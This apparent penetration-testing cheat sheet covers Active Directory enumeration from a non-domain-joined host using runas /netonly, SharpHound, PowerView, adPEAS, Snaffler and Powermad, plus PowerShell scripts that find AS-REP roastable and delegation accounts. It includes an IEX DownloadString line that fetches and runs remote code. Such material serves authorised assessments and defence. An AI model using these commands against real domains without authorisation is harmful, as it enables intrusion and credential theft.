Log in as a local admin user and, if DNS is not configured automatically when the IP address is assigned, first set the system DNS server to the IP address of a domain controller in the target domain.
(Control Panel > Network and Internet > Network Connections > Ethernet Properties > IPv4 Properties)
It can also be set through PowerShell:
#Open a PowerShell window as Administrator.
Get-NetAdapter; $index = $(Read-Host -Prompt '[*] Set index of interface '); $dnsIp = $(Read-Host -Prompt '[*] DC IP address ');
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsIp
Check that you can resolve the target domain:
ping unsafe.local
nslookup unsafe.local
After each of the runas commands below, check that you can reach the SYSVOL and NETLOGON shares with the following command:
net view \\unsafe.local\
You must see the SYSVOL and NETLOGON shares if you supplied a valid password to "runas". Note that runas /netonly does not validate the password when it spawns the process; the credentials are only used for network authentication, so a wrong password only shows up when a command such as net view fails with a logon failure.
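The whole bootstrap above in one script, as an added example that is not part of the original page: it sets the DNS server, locates the DCs through the _ldap._tcp.dc._msdcs SRV record, verifies the credential with an explicit LDAP bind (which, unlike runas /netonly, fails immediately on a bad password) and then confirms SYSVOL is readable with that credential. The DC IP, adapter selection, domain name and account are assumed placeholders.

```powershell
# Added example, not from the original page. Placeholder values below are assumptions.
Add-Type -AssemblyName System.DirectoryServices

$DcIp     = '10.10.10.5'      # assumption: IP of a DC in the target domain
$Domain   = 'unsafe.local'
$UserName = 'UNSAFE\ruser'
$Password = 'S3cP@ss'

# 1. Point the first connected adapter at the DC (run as local Administrator).
$adapter = Get-NetAdapter | Where-Object { $_.Status -eq 'Up' } | Select-Object -First 1
Set-DnsClientServerAddress -InterfaceIndex $adapter.ifIndex -ServerAddresses $DcIp

# 2. Find domain controllers through the _ldap._tcp.dc._msdcs SRV record.
function Get-DomainControllerNames {
    param([string]$DomainName, [string]$DnsServer)
    Resolve-DnsName -Type SRV -Name "_ldap._tcp.dc._msdcs.$DomainName" -Server $DnsServer |
        Where-Object { $_.Type -eq 'SRV' } |      # the answer also carries glue A records
        Sort-Object Priority, Weight |
        Select-Object -ExpandProperty NameTarget
}

# 3. An LDAP bind against RootDSE fails right away on a bad password; runas /netonly does not.
function Test-LdapCredential {
    param([string]$Server, [string]$User, [string]$Pass)
    $entry = New-Object System.DirectoryServices.DirectoryEntry -ArgumentList @(
        "LDAP://$Server/RootDSE", $User, $Pass,
        [System.DirectoryServices.AuthenticationTypes]::Secure)
    try {
        $entry.RefreshCache()          # forces the bind
        return $true
    } catch {
        Write-Warning "LDAP bind to $Server failed: $($_.Exception.Message)"
        return $false
    } finally {
        $entry.Dispose()
    }
}

# 4. Map SYSVOL with the same credential; listing it proves the share and its ACLs are reachable.
function Test-SysvolAccess {
    param([string]$Server, [pscredential]$Credential)
    try {
        $null = New-PSDrive -Name SysvolCheck -PSProvider FileSystem -Root "\\$Server\SYSVOL" `
                            -Credential $Credential -ErrorAction Stop
        (Get-ChildItem 'SysvolCheck:\' -ErrorAction Stop | Measure-Object).Count -gt 0
    } catch {
        Write-Warning "SYSVOL on $Server not accessible: $($_.Exception.Message)"
        $false
    } finally {
        Remove-PSDrive -Name SysvolCheck -ErrorAction SilentlyContinue
    }
}

$dcs = @(Get-DomainControllerNames -DomainName $Domain -DnsServer $DcIp)
"[*] Domain controllers: $($dcs -join ', ')"

if ($dcs.Count -gt 0 -and (Test-LdapCredential -Server $dcs[0] -User $UserName -Pass $Password)) {
    $secure = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName, $secure
    "[*] SYSVOL readable on $($dcs[0]): $(Test-SysvolAccess -Server $dcs[0] -Credential $cred)"
}
```

Because the bind and the share mapping carry the credential explicitly, this check works from a plain Administrator PowerShell without runas /netonly; the runas-spawned shells in the sections below are still needed for tools that only use the process token.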
Nslookup
#For finding DCs
C:\> nslookup
> set type=SRV
> _ldap._tcp.dc._msdcs.unsafe.local
#To find all of the available records
C:\> nslookup -type=any unsafe.local
Gpresult
#Displays verbose policy information for remote computer
gpresult /v /s target-IP /u username /p password /scope computer
gpresult /z /s target-IP /u username /p password /scope computer
#Displays RSoP summary data for remote computer
gpresult /r /s target-IP /u username /p password /scope computerRSAT
#1. Download and install RSAT
#2. Run cmd.exe as Administrator
#3. Spawn an MMC as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser "mmc /server=unsafe.local"
#4. File > Open > navigate to C:\Windows\System32 and open a snap-in console such as dsa.msc (Active Directory Users and Computers).
Powershell ActiveDirectory Module
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Run cmdlets. Pass -Server explicitly because the host is not domain-joined and cannot locate a DC on its own.
C:\> Get-ADDomain -Server DC1.unsafe.local
C:\> Get-ADUser -Identity luser -Server DC_IP_address -Properties *
Netdom
# List workstation, server, dc, pdc, fsmo and trust information
C:\> netdom query fsmo /domain:unsafe.local
C:\> netdom query workstation /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query server /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query dc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query pdc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query trust /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
# Adding a computer account
C:\> netdom add machine /d:unsafe.local /ud:UNSAFE\luser /pd:S3cP@ss
Dsquery
# List user, computer, OU, site and server information, and query with an LDAP filter
C:\> dsquery user -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery computer -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery ou -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery site -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery server -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery * "CN=Users,DC=unsafe,DC=local" -u unsafe\luser -p P@ssw0rd -d unsafe.local
# Users with PASSWD_NOTREQD (userAccountControl bit 32) set; 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND OID
C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl -u unsafe\luser -p P@ssw0rd -d unsafe.local
PowerView
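The same bitwise LDAP query done from PowerShell with explicit credentials and no runas, as an added example that is not part of the original page. It generalises the dsquery line above: the filter is built for any userAccountControl flag in a small table, results are paged so domains with more than 1000 matches are returned in full, and each hit's userAccountControl is decoded into flag names. The server, base DN and account are assumed placeholders.

```powershell
# Added example, not from the original page. Server, base DN and account are assumptions.
Add-Type -AssemblyName System.DirectoryServices

# userAccountControl bits that matter during enumeration (documented Microsoft values).
$UacFlags = @{
    ACCOUNTDISABLE                 = 0x0002
    PASSWD_NOTREQD                 = 0x0020
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000
    DONT_REQ_PREAUTH               = 0x400000
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000
}

# LDAP_MATCHING_RULE_BIT_AND: matches objects where (userAccountControl AND bit) != 0.
function Get-UacFilter {
    param([string]$Flag)
    $bit = $UacFlags[$Flag]
    "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=$bit))"
}

function ConvertFrom-Uac {
    param([int]$Value)
    $UacFlags.GetEnumerator() |
        Where-Object { ($Value -band $_.Value) -ne 0 } |
        ForEach-Object { $_.Key } | Sort-Object
}

function Search-Ldap {
    param(
        [string]$Server, [string]$BaseDn, [string]$Filter, [string[]]$Attributes,
        [string]$UserName, [string]$Password
    )
    $root = New-Object System.DirectoryServices.DirectoryEntry -ArgumentList @(
        "LDAP://$Server/$BaseDn", $UserName, $Password,
        [System.DirectoryServices.AuthenticationTypes]::Secure)
    $searcher = New-Object System.DirectoryServices.DirectorySearcher -ArgumentList $root, $Filter, $Attributes
    $searcher.SearchScope = 'Subtree'
    $searcher.PageSize    = 500     # paged results; without this the DC caps the answer at 1000 objects
    $searcher.FindAll()
}

$Server   = 'dc.unsafe.local'
$BaseDn   = 'DC=unsafe,DC=local'
$UserName = 'UNSAFE\luser'
$Password = 'P@ssw0rd'

foreach ($flag in 'PASSWD_NOTREQD', 'DONT_REQ_PREAUTH', 'TRUSTED_FOR_DELEGATION') {
    "[*] Users with $flag set:"
    Search-Ldap -Server $Server -BaseDn $BaseDn -Filter (Get-UacFilter $flag) `
                -Attributes 'distinguishedName', 'userAccountControl' `
                -UserName $UserName -Password $Password |
        ForEach-Object {
            $uac = [int]$_.Properties['useraccountcontrol'][0]
            '  {0}  uac={1} [{2}]' -f $_.Properties['distinguishedname'][0], $uac, ((ConvertFrom-Uac $uac) -join ',')
        }
}
```

DONT_REQ_PREAUTH hits are AS-REP roastable accounts and TRUSTED_FOR_DELEGATION hits are unconstrained-delegation hosts or accounts, so the same three-line loop doubles as a quick triage of the weakest account settings in the domain.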
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module C:\Users\desktop2\Desktop\AD-Tools\Tools\PowerView_dev.ps1
#4. Run a cmdlet
Get-NetDomain
ADACLScanner (unstable)
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Generate a report from the command line:
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -Output HTML -Show
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -EffectiveRightsPrincipal ruser -Output HTML -Show
adPEAS
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1')
#The Bloodhound module is left out of the module list below
Invoke-adPEAS -Domain unsafe.local -Username 'unsafe\luser' -Password 'S3cP@ss' -Module Domain,CA,Creds,Delegation,Accounts,Computer -Vulns
ADRecon
# To run ADRecon on a non-member host using LDAP.
PS C:\> .\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>
SharpHound
#Method 1
#1. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#2. Run SharpHound, using the -d flag to specify the AD domain you want to collect information from. You can also use any other flags you wish.
C:\> SharpHound.exe -d unsafe.local -c All --outputdirectory C:\Users\desktop2\Desktop
#3. Session loop collection (the default loop duration is 2 hours)
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --Loopduration 01:00:00
#Method 2
C:\> SharpHound.exe -d unsafe.local -c All --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods LoggedOn --ldapusername ruser --ldappassword Password
#Note: After uploading the data to BloodHound, AD-miner can be run against the neo4j database to generate a report.
AD-miner -c -cf Report -u neo4j -p mypassword
PurpleKnight
#1. Download PurpleKnight and unzip the archive
#2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#3. Set Execution policy as Bypass
C:\> powershell -c "Set-ExecutionPolicy Bypass -Scope CurrentUser"
#4. Run the executable from CMD
C:\> .\PurpleKnight.exe
#5. The tool opens and, as expected on a non-joined host, does not detect a forest. Type the domain name (e.g. unsafe.local) and click Select > Next > 'Run tests'.
Pingcastle
#1. Download Pingcastle and unzip the archive
#2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#3. Generate an HTML healthcheck report for the domain:
C:\> .\PingCastle.exe --log --healthcheck --server unsafe.local
#4. To scan for the Zerologon vulnerability:
C:\> .\PingCastle.exe --log --scanner zerologon --server unsafe.local
.Net System.DirectoryServices.ActiveDirectory namespace
#1. Spawn a PowerShell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#Note: GetCurrentForest()/GetCurrentDomain() rely on the local machine's domain membership, so on a non-domain-joined host they throw "Current security context is not associated with an Active Directory domain or forest" even under runas /netonly. In that case build an explicit DirectoryContext with the domain or forest name (as in the forest trust example further down) and call GetDomain()/GetForest() instead.
#Get the forest information:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
#Get the current user's domain information:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
#Get information of DCs:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
#Find the PDC emulator:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner
#Find Schema Master:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Forest.SchemaRoleOwner
#Get trusts for forest:
$forest = "unsafe.local"
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $forest)))).GetAllTrustRelationships()
#Get trusts for current domain:
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
#Get a list of sites in the forest:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().sites
#Determine the SID filtering status of a trust. If the output is "true", SID filtering is enabled.
$domain="gotham.unsafe.local"
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetSidFilteringStatus($domain)
Powermad
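The same enumeration written for a non-domain-joined host, as an added example that is not part of the original page. It never calls GetCurrentDomain()/GetCurrentForest(); every object is obtained through a DirectoryContext that names the domain or forest and carries the credential, so it runs from any Administrator PowerShell (under runas /netonly the username and password arguments can be dropped and the /netonly credential is used for the network authentication instead). It walks the DCs, all five FSMO roles, forest and domain trusts with their SID filtering state, sites, and finally ms-DS-MachineAccountQuota, the value that decides whether the Powermad step below will succeed for an ordinary user. Domain, forest and account names are assumed placeholders.

```powershell
# Added example, not from the original page. Names and credentials are assumptions.
Add-Type -AssemblyName System.DirectoryServices

$DomainName = 'unsafe.local'
$ForestName = 'unsafe.local'
$UserName   = 'UNSAFE\ruser'
$Password   = 'S3cP@ss'

# Explicit context: works from a non-joined host where GetCurrentDomain() would throw.
function New-AdContext {
    param([string]$Type, [string]$Name)
    New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext -ArgumentList @(
        [System.DirectoryServices.ActiveDirectory.DirectoryContextType]$Type, $Name, $UserName, $Password)
}

$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain((New-AdContext 'Domain' $DomainName))
$forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-AdContext 'Forest' $ForestName))

'[*] Domain controllers:'
$domain.DomainControllers | ForEach-Object {
    '  {0}  site={1}  ip={2}' -f $_.Name, $_.SiteName, $_.IPAddress
}

'[*] FSMO role owners:'
'  PDC emulator:    {0}' -f $domain.PdcRoleOwner
'  RID master:      {0}' -f $domain.RidRoleOwner
'  Infrastructure:  {0}' -f $domain.InfrastructureRoleOwner
'  Schema master:   {0}' -f $forest.SchemaRoleOwner
'  Naming master:   {0}' -f $forest.NamingRoleOwner

'[*] Forest trusts:'
$forest.GetAllTrustRelationships() | ForEach-Object {
    '  {0} -> {1}  type={2}  direction={3}' -f $_.SourceName, $_.TargetName, $_.TrustType, $_.TrustDirection
}

# SID filtering true = quarantine on, SID history from the trusted side is not honoured.
'[*] Domain trusts and SID filtering:'
$domain.GetAllTrustRelationships() | ForEach-Object {
    $sidFiltering = 'n/a'
    try { $sidFiltering = $domain.GetSidFilteringStatus($_.TargetName) } catch { }
    '  {0}  type={1}  direction={2}  sidFiltering={3}' -f $_.TargetName, $_.TrustType, $_.TrustDirection, $sidFiltering
}

'[*] Sites: ' + (($forest.Sites | ForEach-Object Name) -join ', ')

# Default is 10: any authenticated user may then create that many machine accounts (Powermad).
$maq = $domain.GetDirectoryEntry().Properties['ms-DS-MachineAccountQuota'].Value
"[*] ms-DS-MachineAccountQuota = $maq"
```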
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module .\Powermad.ps1
#4. Add a machine account (works for an ordinary user only while ms-DS-MachineAccountQuota is above 0 and the user has not used up the quota)
$pass = ConvertTo-SecureString "MaQ.321" -AsPlainText -Force
New-MachineAccount -MachineAccount maq -Password $pass -Verbose
# Get an attribute value of the machine account
Get-MachineAccountAttribute -MachineAccount maq -Attribute distinguishedname
# Get SID of the machine account creator (ms-DS-CreatorSID)
Get-MachineAccountCreator -DistinguishedName "CN=maq,CN=Computers,DC=unsafe,DC=local"
Get-MachineAccountCreator
# Set an attribute value of the machine account
Set-MachineAccountAttribute -MachineAccount maq -Attribute description -Value test
# Disable the machine account
Disable-MachineAccount -MachineAccount maq
LAPSToolkit
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module .\LAPSToolkit.ps1
#4. Displays all computers with LAPS enabled
Get-LAPSComputers
#5. Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute.
Find-LAPSDelegatedGroups
#6. Checks the rights on each computer with LAPS enabled for any groups with read access and users with AllExtendedRights.
Find-AdmPwdExtendedRights
LDAPMonitor
# For monitoring creation, deletion and changes to LDAP objects
C:\> SharpLDAPmonitor.exe /dcip:DC_IP_address /user:UNSAFE\luser /pass:S3cP@ss
Snaffler
#1. Spawn a CMD as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#2. Fire up Snaffler
C:\> Snaffler.exe -s -d unsafe.local -c [DomainController-IP] -o snaffler.log
References
https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html
https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc772217(v=ws.11)
https://github.com/p0dalirius/LDAPmonitor
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
https://github.com/61106960/adPEAS
https://github.com/Kevin-Robertson/Powermad
https://github.com/leoloobeek/LAPSToolkit
https://www.pingcastle.com/
https://www.purple-knight.com/
https://github.com/SnaffCon/Snaffler
https://github.com/sense-of-security/ADRecon
https://github.com/Mazars-Tech/AD_Miner